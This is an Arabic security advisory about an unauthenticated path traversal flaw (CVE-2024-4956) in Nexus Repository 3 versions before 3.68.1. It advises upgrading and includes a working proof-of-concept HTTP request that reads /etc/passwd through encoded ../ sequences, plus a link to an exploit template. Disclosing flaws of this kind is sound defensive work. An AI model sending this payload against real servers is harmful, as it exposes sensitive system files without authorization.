
اجتياز المسار غير المصادق عليه في Nexus Repository 3
مدير مستودع Nexus هو مدير مستودع ينظم ويخزن ويوزع القطع الأثرية اللازمة للتطوير.
تم اكتشاف ثغرة اجتياز المسار في Nexus Repository 3، في الإصدارات السابقة لـ 3.68.1. تسمح هذه الثغرة للمهاجم بصياغة عنوان URL لتنزيل ملفات النظام خارج نطاق تطبيق Nexus Repository، دون أي مصادقة. يشكل هذا خطرًا كبيرًا حيث يمكن أن يكشف ملفات النظام الحساسة وربما يعرض أمان البيئة التي تم تركيب Nexus Repository فيها للخطر.
يوصى بتحديث Nexus Repository إلى الإصدار 3.68.1 أو أحدث في أقرب وقت ممكن للتخفيف من هذه الثغرة.
لمزيد من المعلومات والتفاصيل التقنية حول الثغرة، يرجى الرجوع إلى الرابط التالي:
المراجع:
تؤثر الثغرة على الإصدارات من 3.0 إلى 3.68.0 من Sonatype Nexus Repository Manager.
ترقية Nexus Repository هي الطريقة الموصى بها للقضاء على هذه الثغرة. ومع ذلك، تتوفر خيارات تخفيف فورية للنشر الذي لا يمكن الترقية فورًا:
المراجع:
GET /%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Cache-Control: max-age=0
مع إثبات المفهوم أعلاه، من الممكن رؤية ملف /etc/passwd يتم الوصول إليه:

(CVE-2024-4956.yaml) https://github.com/erickfernandox/CVE-2024-4956/blob/main/CVE-2024-4956.yaml